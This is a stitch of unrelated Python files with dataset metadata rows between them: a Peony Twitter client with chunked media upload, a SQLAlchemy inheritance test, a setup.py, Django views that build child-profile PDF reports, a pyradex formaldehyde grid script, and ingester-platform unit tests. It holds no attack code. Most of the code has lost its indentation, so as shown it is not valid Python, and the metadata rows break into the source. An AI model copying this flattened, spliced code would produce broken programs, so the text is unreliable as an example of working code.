async def request(self, method, url, future,
headers=None,
session=None,
encoding=None,
**kwargs):
"""
Make requests to the REST API
Parameters
----------
future : asyncio.Future
Future used to return the response
method : str
Method to be used by the request
url : str
URL of the resource
headers : .oauth.PeonyHeaders
Custom headers (doesn't overwrite `Authorization` headers)
session : aiohttp.ClientSession, optional
Client session used to make the request
Returns
-------
data.PeonyResponse
Response to the request
"""
await self.setup
# prepare request arguments, particularly the headers
req_kwargs = await self.headers.prepare_request(
method=method,
url=url,
headers=headers,
proxy=self.proxy,
**kwargs
)
if encoding is None:
encoding = self.encoding
session = session if (session is not None) else self._session
logger.debug("making request with parameters: %s" % req_kwargs)
async with session.request(**req_kwargs) as response:
if response.status < 400:
data = await data_processing.read(response, self._loads,
encoding=encoding)
future.set_result(data_processing.PeonyResponse(
data=data,
headers=response.headers,
url=response.url,
request=req_kwargs
))
else: # throw exception if status is not 2xx
await exceptions.throw(response, loads=self._loads,
encoding=encoding, url=url)
def stream_request(self, method, url, headers=None, _session=None,
*args, **kwargs):
"""
Make requests to the Streaming API
Parameters
----------
method : str
Method to be used by the request
url : str
URL of the resource
headers : dict
Custom headers (doesn't overwrite `Authorization` headers)
_session : aiohttp.ClientSession, optional
The session to use for this specific request, the session
given as argument of :meth:`__init__` is used by default
Returns
-------
.stream.StreamResponse
Stream context for the request
"""
return StreamResponse(
method=method,
url=url,
client=self,
headers=headers,
session=_session,
proxy=self.proxy,
**kwargs
)
@classmethod
def event_stream(cls, event_stream):
""" Decorator to attach an event stream to the class """
cls._streams.append(event_stream)
return event_stream
def _get_tasks(self):
return [task(self) for task in self._tasks['tasks']]
def get_tasks(self):
"""
Get the tasks attached to the instance
Returns
-------
list
List of tasks (:class:`asyncio.Task`)
"""
tasks = self._get_tasks()
tasks.extend(self._streams.get_tasks(self))
return tasks
async def run_tasks(self):
""" Run the tasks attached to the instance """
tasks = self.get_tasks()
self._gathered_tasks = asyncio.gather(*tasks, loop=self.loop)
try:
await self._gathered_tasks
except CancelledError:
pass
async def arun(self):
try:
await self.run_tasks()
except KeyboardInterrupt:
pass
finally:
await self.close()
def run(self):
""" Run the tasks attached to the instance """
self.loop.run_until_complete(self.arun())
def _get_close_tasks(self):
tasks = []
# cancel setup
if isinstance(self.setup, asyncio.Future):
if not self.setup.done():
async def cancel_setup():
self.setup.cancel()
try:
await self.setup
except CancelledError: # pragma: no cover
pass
tasks.append(self.loop.create_task(cancel_setup()))
# close currently running tasks
if self._gathered_tasks is not None:
async def cancel_tasks():
self._gathered_tasks.cancel()
try:
await self._gathered_tasks
except CancelledError:
pass
tasks.append(self.loop.create_task(cancel_tasks()))
return tasks
async def close(self):
""" properly close the client """
tasks = self._get_close_tasks()
if tasks:
await asyncio.wait(tasks)
# close the session only if it was created by peony
if not self._user_session and self._session is not None:
with suppress(TypeError, AttributeError):
await self._session.close()
self._session = None
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.close()
class PeonyClient(BasePeonyClient):
"""
A client with some useful methods for most usages
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = self.loop.create_task(self._get_user())
async def _get_user(self, init=False):
"""
create a ``user`` attribute with the response of the endpoint
https://api.twitter.com/1.1/account/verify_credentials.json
"""
api = self['api', general.twitter_api_version,
".json", general.twitter_base_api_url]
if isinstance(self.headers, oauth.OAuth1Headers):
return await api.account.verify_credentials.get()
raise PeonyUnavailableMethod("user attribute is only available with "
"OAuth 1 authentification.")
def _get_close_tasks(self):
tasks = super()._get_close_tasks()
if not self.user.done():
async def cancel_user():
self.user.cancel()
try:
await self.user
except CancelledError: # pragma: no cover
pass
tasks.append(self.loop.create_task(cancel_user()))
return tasks
async def _chunked_upload(self, media, media_size,
path=None,
media_type=None,
media_category=None,
chunk_size=2**20,
**params):
"""
upload media in chunks
Parameters
----------
media : file object
a file object of the media
media_size : int
size of the media
path : str, optional
filename of the media
media_type : str, optional
mime type of the media
media_category : str, optional
twitter media category, must be used with ``media_type``
chunk_size : int, optional
size of a chunk in bytes
params : dict, optional
additional parameters of the request
Returns
-------
.data_processing.PeonyResponse
Response of the request
"""
if isinstance(media, bytes):
media = io.BytesIO(media)
chunk = media.read(chunk_size)
is_coro = asyncio.iscoroutine(chunk)
if is_coro:
chunk = await chunk
if media_type is None:
media_metadata = await utils.get_media_metadata(chunk, path)
media_type, media_category = media_metadata
elif media_category is None:
media_category = utils.get_category(media_type)
response = await self.upload.media.upload.post(
command="INIT",
total_bytes=media_size,
media_type=media_type,
media_category=media_category,
**params
)
media_id = response['media_id']
i = 0
while chunk:
req = self.upload.media.upload.post(command="APPEND",
media_id=media_id,
media=chunk,
segment_index=i)
if is_coro:
chunk, _ = await asyncio.gather(media.read(chunk_size), req)
else:
await req
chunk = media.read(chunk_size)
i += 1
status = await self.upload.media.upload.post(command="FINALIZE",
media_id=media_id)
if 'processing_info' in status:
while status['processing_info'].get('state') != "succeeded":
processing_info = status['processing_info']
if processing_info.get('state') == "failed":
error = processing_info.get('error', {})
message = error.get('message', str(status))
raise exceptions.MediaProcessingError(data=status,
message=message,
**params)
delay = processing_info['check_after_secs']
await asyncio.sleep(delay)
status = await self.upload.media.upload.get(
command="STATUS",
media_id=media_id,
**params
)
return response
async def upload_media(self, file_,
media_type=None,
media_category=None,
chunked=None,
size_limit=3 * (1024**2),
**params):
"""
upload a media file on twitter
Parameters
----------
file_ : str or pathlib.Path or file
Path to the file or file object
media_type : str, optional
mime type of the media
media_category : str, optional
Twitter's media category of the media, must be used with
``media_type``
chunked : bool, optional
If True, force the use of the chunked upload for the media
size_limit : int, optional
If set, the media will be sent using a multipart upload if
its size is over ``size_limit`` bytes
params : dict
parameters used when making the request
Returns
-------
.data_processing.PeonyResponse
Response of the request
"""
if isinstance(file_, str):
url = urlparse(file_)
if url.scheme.startswith('http'):
media = await self._session.get(file_)
else:
path = urlparse(file_).path.strip(" \"'")
media = await utils.execute(open(path, 'rb'))
elif hasattr(file_, 'read') or isinstance(file_, bytes):
media = file_
else:
raise TypeError("upload_media input must be a file object or a "
"filename or binary data or an aiohttp request")
media_size = await utils.get_size(media)
if chunked is not None:
size_test = False
else:
size_test = media_size > size_limit
if isinstance(media, aiohttp.ClientResponse):
# send the content of the response
media = media.content
if chunked or (size_test and chunked is None):
args = media, media_size, file_, media_type, media_category
response = await self._chunked_upload(*args, **params)
else:
response = await self.upload.media.upload.post(media=media,
**params)
if not hasattr(file_, 'read') and not getattr(media, 'closed', True):
media.close()
return response
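    # Usage sketch (illustrative; assumes an authenticated client inside a
    # coroutine, and Twitter's statuses/update endpoint, which is not defined
    # in this file):
    #     media = await client.upload_media('picture.png')
    #     await client.api.statuses.update.post(status="hello",
    #                                           media_ids=media['media_id'])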
| mit | 5,343,106,315,839,828,000 | 30.837758 | 79 | 0.530714 | false | 4.803293 | false | false | false |
mastizada/kuma | vendor/packages/sqlalchemy/test/orm/inheritance/test_magazine.py | 7 | 9296 | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.test import testing
from sqlalchemy.util import function_named
from test.orm import _base
from sqlalchemy.test.schema import Table, Column
class BaseObject(object):
def __init__(self, *args, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
class Publication(BaseObject):
pass
class Issue(BaseObject):
pass
class Location(BaseObject):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, str(getattr(self, 'issue_id', None)), repr(str(self._name.name)))
def _get_name(self):
return self._name
def _set_name(self, name):
session = create_session()
s = session.query(LocationName).filter(LocationName.name==name).first()
session.expunge_all()
if s is not None:
self._name = s
return
found = False
for i in session.new:
if isinstance(i, LocationName) and i.name == name:
self._name = i
found = True
break
if found == False:
self._name = LocationName(name=name)
name = property(_get_name, _set_name)
class LocationName(BaseObject):
def __repr__(self):
return "%s()" % (self.__class__.__name__)
class PageSize(BaseObject):
def __repr__(self):
return "%s(%sx%s, %s)" % (self.__class__.__name__, self.width, self.height, self.name)
class Magazine(BaseObject):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, repr(self.location), repr(self.size))
class Page(BaseObject):
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, str(self.page_no))
class MagazinePage(Page):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, str(self.page_no), repr(self.magazine))
class ClassifiedPage(MagazinePage):
pass
class MagazineTest(_base.MappedTest):
@classmethod
def define_tables(cls, metadata):
global publication_table, issue_table, location_table, location_name_table, magazine_table, \
page_table, magazine_page_table, classified_page_table, page_size_table
publication_table = Table('publication', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(45), default=''),
)
issue_table = Table('issue', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('publication_id', Integer, ForeignKey('publication.id')),
Column('issue', Integer),
)
location_table = Table('location', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('issue_id', Integer, ForeignKey('issue.id')),
Column('ref', CHAR(3), default=''),
Column('location_name_id', Integer, ForeignKey('location_name.id')),
)
location_name_table = Table('location_name', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(45), default=''),
)
magazine_table = Table('magazine', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('location_id', Integer, ForeignKey('location.id')),
Column('page_size_id', Integer, ForeignKey('page_size.id')),
)
page_table = Table('page', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('page_no', Integer),
Column('type', CHAR(1), default='p'),
)
magazine_page_table = Table('magazine_page', metadata,
Column('page_id', Integer, ForeignKey('page.id'), primary_key=True),
Column('magazine_id', Integer, ForeignKey('magazine.id')),
Column('orders', Text, default=''),
)
classified_page_table = Table('classified_page', metadata,
Column('magazine_page_id', Integer, ForeignKey('magazine_page.page_id'), primary_key=True),
Column('titles', String(45), default=''),
)
page_size_table = Table('page_size', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('width', Integer),
Column('height', Integer),
Column('name', String(45), default=''),
)
def generate_round_trip_test(use_unions=False, use_joins=False):
def test_roundtrip(self):
publication_mapper = mapper(Publication, publication_table)
issue_mapper = mapper(Issue, issue_table, properties = {
'publication': relationship(Publication, backref=backref('issues', cascade="all, delete-orphan")),
})
location_name_mapper = mapper(LocationName, location_name_table)
location_mapper = mapper(Location, location_table, properties = {
'issue': relationship(Issue, backref=backref('locations', lazy='joined', cascade="all, delete-orphan")),
'_name': relationship(LocationName),
})
page_size_mapper = mapper(PageSize, page_size_table)
magazine_mapper = mapper(Magazine, magazine_table, properties = {
'location': relationship(Location, backref=backref('magazine', uselist=False)),
'size': relationship(PageSize),
})
if use_unions:
page_join = polymorphic_union(
{
'm': page_table.join(magazine_page_table),
'c': page_table.join(magazine_page_table).join(classified_page_table),
'p': page_table.select(page_table.c.type=='p'),
}, None, 'page_join')
page_mapper = mapper(Page, page_table, with_polymorphic=('*', page_join), polymorphic_on=page_join.c.type, polymorphic_identity='p')
elif use_joins:
page_join = page_table.outerjoin(magazine_page_table).outerjoin(classified_page_table)
page_mapper = mapper(Page, page_table, with_polymorphic=('*', page_join), polymorphic_on=page_table.c.type, polymorphic_identity='p')
else:
page_mapper = mapper(Page, page_table, polymorphic_on=page_table.c.type, polymorphic_identity='p')
if use_unions:
magazine_join = polymorphic_union(
{
'm': page_table.join(magazine_page_table),
'c': page_table.join(magazine_page_table).join(classified_page_table),
}, None, 'page_join')
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, with_polymorphic=('*', magazine_join), inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=magazine_join.c.page_no))
})
elif use_joins:
magazine_join = page_table.join(magazine_page_table).outerjoin(classified_page_table)
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, with_polymorphic=('*', magazine_join), inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=page_table.c.page_no))
})
else:
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=page_table.c.page_no))
})
classified_page_mapper = mapper(ClassifiedPage,
classified_page_table,
inherits=magazine_page_mapper,
polymorphic_identity='c',
primary_key=[page_table.c.id])
session = create_session()
pub = Publication(name='Test')
issue = Issue(issue=46,publication=pub)
location = Location(ref='ABC',name='London',issue=issue)
page_size = PageSize(name='A4',width=210,height=297)
magazine = Magazine(location=location,size=page_size)
page = ClassifiedPage(magazine=magazine,page_no=1)
page2 = MagazinePage(magazine=magazine,page_no=2)
page3 = ClassifiedPage(magazine=magazine,page_no=3)
session.add(pub)
session.flush()
print [x for x in session]
session.expunge_all()
session.flush()
session.expunge_all()
p = session.query(Publication).filter(Publication.name=="Test").one()
print p.issues[0].locations[0].magazine.pages
print [page, page2, page3]
assert repr(p.issues[0].locations[0].magazine.pages) == repr([page, page2, page3]), repr(p.issues[0].locations[0].magazine.pages)
    test_roundtrip = function_named(
        test_roundtrip, "test_%s" % (not use_unions and (use_joins and "joins" or "select") or "unions"))
setattr(MagazineTest, test_roundtrip.__name__, test_roundtrip)
for (use_union, use_join) in [(True, False), (False, True), (False, False)]:
generate_round_trip_test(use_union, use_join)
| mpl-2.0 | 106,685,178,715,532,510 | 41.254545 | 176 | 0.600796 | false | 3.771197 | true | false | false |
udemy-course/udemy | setup.py | 1 | 1468 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import os
from udemy import __title__
from udemy import __version__
from udemy import __author__
from udemy import __email__
# from distutils.core import setup
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = '\n' + f.read()
setup(
name=__title__,
version=__version__,
author=__author__,
author_email=__email__,
description='My short description for my project. ',
long_description=long_description,
url='https://github.com/udemy-course/udemy',
packages=find_packages(exclude=('tests',)),
install_requires=['requests'],
entry_points='''
[console_scripts]
udemy-cli=udemy.cli:main
''',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'License :: OSI Approved :: ISC License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy']
)
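# A minimal local usage sketch (assuming a standard setuptools checkout):
#   pip install -e .
#   udemy-cli        # console script declared in entry_points above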
| apache-2.0 | -1,127,698,628,932,444,200 | 30.234043 | 74 | 0.660763 | false | 3.725888 | false | false | false |
tnemisteam/cdf-steps | reports_basic/views.py | 3 | 10027 | from django.shortcuts import render
from django.views.generic import View
from baseapp.models import School,Block,Class_Studying,Academic_Year,District
from students.models import Child_detail
from django.template.loader import get_template
from django.template import Context
import cStringIO as StringIO
import xhtml2pdf.pisa as pisa
from django.http import HttpResponse, Http404
from django.core.paginator import Paginator, PageNotAnInteger
from django.conf import settings
import cgi
import os
def render_to_pdf(template_src, context_dict, filename):
template = get_template(template_src)
context = Context(context_dict)
html = template.render(context)
result = StringIO.StringIO()
pdf = pisa.pisaDocument(
StringIO.StringIO(html.encode("UTF-8")), result, link_callback=fetch_resources)
if not pdf.err:
outfile = HttpResponse(result.getvalue(), mimetype="application/pdf")
outfile['Content-Disposition'] = 'attachment; filename=' + \
filename + '.pdf'
return outfile
    return HttpResponse('We had some error on report generation<pre>%s</pre>' % cgi.escape(html))
def fetch_resources(uri, rel):
path = os.path.join(
settings.MEDIA_ROOT, uri.replace(settings.MEDIA_URL, ""))
return path
def download_child_profile(request,ch_id):
child = Child_detail.objects.get(id=ch_id)
pagesize = 'A4'
title = 'Child Profile'
return render_to_pdf('download_child_profile.html', locals(), 'Child_Profile')
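# ReportViewBasic: GET renders the report filter form scoped to the requesting
# user's category (block/district/state level); POST filters Child_detail by
# school, block, district, class and academic year and returns the result as a
# PDF via render_to_pdf().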
class ReportViewBasic(View):
def get(self,request,**kwargs):
if request.user.account.user_category_id == 2 or request.user.account.user_category_id == 5:
school_list = School.objects.filter(block_id=request.user.account.associated_with).order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list})
elif request.user.account.user_category_id == 3 or request.user.account.user_category_id == 6 or request.user.account.user_category_id == 7 or request.user.account.user_category_id == 8 or request.user.account.user_category_id == 12 or request.user.account.user_category_id == 13 or request.user.account.user_category_id == 14:
block_list = Block.objects.filter(district_id=request.user.account.associated_with).order_by('block_name')
school_list = School.objects.filter(district_id=request.user.account.associated_with).order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list,'block_list':block_list})
elif request.user.account.user_category_id == 4 or request.user.account.user_category_id == 9 or request.user.account.user_category_id == 10 or request.user.account.user_category_id == 11 or request.user.account.user_category_id == 15 or request.user.account.user_category_id == 16 or request.user.account.user_category_id == 17:
district_list = District.objects.all().order_by('district_name')
block_list = Block.objects.all().order_by('block_name')
school_list = School.objects.all().order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list,'block_list':block_list,'district_list':district_list})
return render(request,'report_list_basic.html',locals())
    def post(self, request, **kwargs):
        if request.POST["class_studying"] == "all":
            class_studying = request.POST["class_studying"]
        if request.POST["academic_year"] == "all":
            academic_year = request.POST["academic_year"]
if request.user.account.user_category_id == 2 or request.user.account.user_category_id == 5:
school_list = School.objects.filter(block_id=request.user.account.associated_with).order_by('school_name')
school_id = request.POST["school_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
elif request.user.account.user_category_id == 3 or request.user.account.user_category_id == 6 or request.user.account.user_category_id == 7 or request.user.account.user_category_id == 8 or request.user.account.user_category_id == 12 or request.user.account.user_category_id == 13 or request.user.account.user_category_id == 14:
block_list = Block.objects.filter(district_id=request.user.account.associated_with).order_by('block_name')
school_list = School.objects.filter(district_id=request.user.account.associated_with).order_by('school_name')
school_id = request.POST["school_list"]
block_id = request.POST["block_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
elif request.user.account.user_category_id == 4 or request.user.account.user_category_id == 9 or request.user.account.user_category_id == 10 or request.user.account.user_category_id == 11 or request.user.account.user_category_id == 15 or request.user.account.user_category_id == 16 or request.user.account.user_category_id == 17:
district_list = District.objects.all().order_by('district_name')
block_list = Block.objects.all().order_by('block_name')
school_list = School.objects.all().order_by('school_name')
school_id = request.POST["school_list"]
block_id = request.POST["block_list"]
district_id = request.POST["district_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
else:
school_id = request.user.account.associated_with
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=school_id)
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=school_id,class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(school_id=school_id,academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(school_id=school_id,class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
cls_stud = Class_Studying.objects.get(id=request.POST["class_studying"])
class_study = cls_stud.class_studying
acad_yr = Academic_Year.objects.get(id=request.POST["academic_year"])
aca_year = acad_yr.academic_year
schl_name = School.objects.get(id=school_id)
school_name = schl_name.school_name
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
pagesize = 'A4'
title = 'Child Profile'
return render(request,'report_list_basic.html',locals())
| mit | 535,483,344,508,277,800 | 79.216 | 337 | 0.675177 | false | 3.538109 | false | false | false |
low-sky/h2codumb | h2cogrids.py | 1 | 1560 | from astropy.table import Table
import pyradex
import numpy as np
R = pyradex.Radex(column=1e16,abundance=1e-4,species='ph2co-h2')
fortho = 0.75
nFWHM = 5
FWHMmin = 0.5
FWHMmax = 5
nDens = 21
nlower = 2
nupper = 6
nCol = 41
Nlower = 10
Nupper = 16
nTemp = 31
Tlower = 10
Tupper = 300
Temps = np.logspace(1,2.5,nTemp)
Cols = 1e1**np.linspace(Nlower,Nupper,nCol)
Densities = 1e1**(np.linspace(nlower,nupper,nDens))
FWHM = np.logspace(np.log10(FWHMmin), np.log10(FWHMmax), nFWHM)
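# Grid dimensions: 31 temperatures (10 to ~316 K), 41 columns, 21 densities and
# 5 line widths, i.e. 31 * 41 * 21 * 5 = 133,455 RADEX calls in the loop below,
# one row of the output table per call.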
outtable = Table(names = ['Tex_303_202','Tex_322_221','Tex_321_220',
'tau_303_202','tau_322_221','tau_321_220',
'Temperature','Column','nH2','FWHM'])
for T in Temps:
for N in Cols:
for n in Densities:
for dV in FWHM:
Tlvg = R(collider_densities={'oH2':n*fortho,'pH2':(1-fortho)*n}, column=N, abundance = 1e-9, species='ph2co-h2',temperature=T,deltav=dV)
outtable.add_row()
outtable[-1]['Tex_303_202'] = Tlvg[2]['Tex']
outtable[-1]['tau_303_202'] = Tlvg[2]['tau']
outtable[-1]['Tex_322_221'] = Tlvg[9]['Tex']
outtable[-1]['tau_322_221'] = Tlvg[9]['tau']
outtable[-1]['Tex_321_220'] = Tlvg[12]['Tex']
outtable[-1]['tau_321_220'] = Tlvg[12]['tau']
outtable[-1]['Temperature'] = T
outtable[-1]['Column'] = N
outtable[-1]['nH2'] = n
outtable[-1]['FWHM'] = dV
outtable.write('ph2cogrid.fits',format='fits',overwrite=True)
| gpl-2.0 | 6,030,501,892,111,791,000 | 28.433962 | 152 | 0.55 | false | 2.648557 | false | false | false |
jcu-eresearch/TDH-dc24-ingester-platform | dc24_ingester_platform/service/tests.py | 1 | 12960 | """This module tests the service CRUD functionality
"""
import unittest
import tempfile
import shutil
import datetime
from dc24_ingester_platform.service import ingesterdb, repodb
from jcudc24ingesterapi.models.locations import Region, Location
from jcudc24ingesterapi.models.dataset import Dataset
from jcudc24ingesterapi.schemas.data_entry_schemas import DataEntrySchema
from jcudc24ingesterapi.schemas.metadata_schemas import DatasetMetadataSchema, DataEntryMetadataSchema
from jcudc24ingesterapi.schemas.data_types import FileDataType, String, Double
from jcudc24ingesterapi.ingester_platform_api import UnitOfWork
from jcudc24ingesterapi.models.data_sources import PullDataSource,\
DatasetDataSource
from jcudc24ingesterapi.models.sampling import PeriodicSampling
from jcudc24ingesterapi.models.data_entry import DataEntry
from jcudc24ingesterapi.ingester_exceptions import InvalidObjectError,\
StaleObjectError, PersistenceError
class TestServiceModels(unittest.TestCase):
def setUp(self):
self.files = tempfile.mkdtemp()
self.repo = repodb.RepositoryDB({"db":"sqlite://", "files":self.files})
self.service = ingesterdb.IngesterServiceDB("sqlite://", self.repo)
def tearDown(self):
del self.service
del self.repo
shutil.rmtree(self.files)
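    # Exercises the full CRUD path: schema/location/dataset persistence, data
    # source and sampling updates, active-dataset queries, searching, and a
    # simple data entry ingest.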
def test_data_types(self):
schema1 = DatasetMetadataSchema("schema1")
schema1.addAttr(FileDataType("file"))
schema1a = self.service.persist(schema1)
self.assertEquals(1, len(schema1a.attrs))
schema2 = DataEntrySchema("schema2")
schema2.addAttr(FileDataType("file"))
schema2.addAttr(Double("x"))
schema2a = self.service.persist(schema2)
loc = Location(10.0, 11.0)
loca = self.service.persist(loc)
dataset = Dataset()
dataset.schema = schema1a.id
dataset.location = loca.id
# We've trying to use a dataset_metadata schema, so this should fail
self.assertRaises(ValueError, self.service.persist, dataset)
dataset.schema = schema2a.id
# Now we're using the correct type of schema
dataset1a = self.service.persist(dataset)
dataset1b = self.service.get_dataset(dataset1a.id)
self.assertEquals(dataset1a.id, dataset1b.id)
self.assertDictEqual(dataset1a.__dict__, dataset1b.__dict__)
# Update and add a data source
dataset1b.data_source = PullDataSource("http://www.abc.net.au", None, recursive=False, field="file", processing_script="TEST", sampling=PeriodicSampling(10000))
dataset1b.enabled = True
dataset1c = self.service.persist(dataset1b)
self.assertNotEqual(None, dataset1c.data_source)
self.assertEqual("TEST", dataset1c.data_source.processing_script)
self.assertNotEqual(None, dataset1c.data_source.sampling)
datasets = self.service.get_active_datasets()
self.assertEquals(1, len(datasets))
self.assertNotEqual(None, datasets[0].data_source)
self.assertEqual("TEST", datasets[0].data_source.processing_script)
self.assertNotEqual(None, datasets[0].data_source.sampling)
# Test with criteria
datasets = self.service.get_active_datasets(kind="pull_data_source")
self.assertEquals(1, len(datasets))
datasets = self.service.get_active_datasets(kind="push_data_source")
self.assertEquals(0, len(datasets))
schema1b = self.service.get_schema(schema1a.id)
self.assertEquals(schema1a.id, schema1b.id)
datasets = self.service.search("dataset")
self.assertEquals(1, len(datasets))
schemas = self.service.search("data_entry_schema")
self.assertEquals(1, len(schemas))
schemas = self.service.search("dataset_metadata_schema")
self.assertEquals(1, len(schemas))
locs = self.service.search("location")
self.assertEquals(1, len(locs))
# Test ingest
data_entry_1 = DataEntry(dataset1b.id, datetime.datetime.now())
data_entry_1['x'] = 27.8
data_entry_1 = self.service.persist(data_entry_1)
self.assertIsNotNone(data_entry_1.id)
def test_region(self):
#{"class":"region", "name": "Region1", "region_points":[(1, 1), (1, 2)]}
region1 = Region("Region 1")
region1.region_points = [(1, 1), (1, 2)]
region1a = self.service.persist(region1)
self.assertEqual(2, len(region1a.region_points), "Not 2 region points")
# def test_unit(self):
# unit = {"insert":[{"id":-2, "class":"dataset", "location":-1, "schema": -3, "data_source":{"class":"test", "param1":"1", "param2":"2"}, "sampling":{"class":"schedule1", "param1":"1", "param2":"2"}},
# {"id":-1, "latitude":30, "longitude": 20, "class":"location"},
# {"id":-3, "attributes":[{"name":"file", "class":"file"}], "class":"data_entry_schema"}], "delete":[], "update":[], "enable":[], "disable":[]}
# unit2 = self.service.commit(unit, None)
# for obj in unit2:
# if obj["class"] == "location":
# self.assertEquals(obj["correlationid"], -1)
# elif obj["class"] == "dataset":
# self.assertEquals(obj["correlationid"], -2)
def test_schema_persistence(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema1)
self.assertGreater(schema1.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema1.attrs))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file2"))
schema2.extends.append(schema1.id)
schema2 = self.service.persist(schema2)
self.assertGreater(schema2.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema2.attrs))
self.assertEquals("file2", schema2.attrs["file2"].name)
def test_schema_persistence_unit(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
unit = UnitOfWork(None)
ids = []
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
ids.append(unit.post(schema1))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file2"))
schema2.extends.append(schema1.id)
ids.append(unit.post(schema2))
ret = self.service.commit(unit, None)
for obj in ret:
self.assertGreater(obj.id, 0)
self.assertIn(obj.correlationid, ids)
def test_schema_persistence_clash(self):
"""This test creates a simple schema hierarchy, that has a field name clash"""
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema1)
self.assertGreater(schema1.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema1.attrs))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file"))
schema2.extends.append(schema1.id)
self.assertRaises(PersistenceError, self.service.persist, schema2)
def test_state_persistence(self):
"""Test that the state of samplers and data sources can be persisted."""
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(0, len(sampler_state))
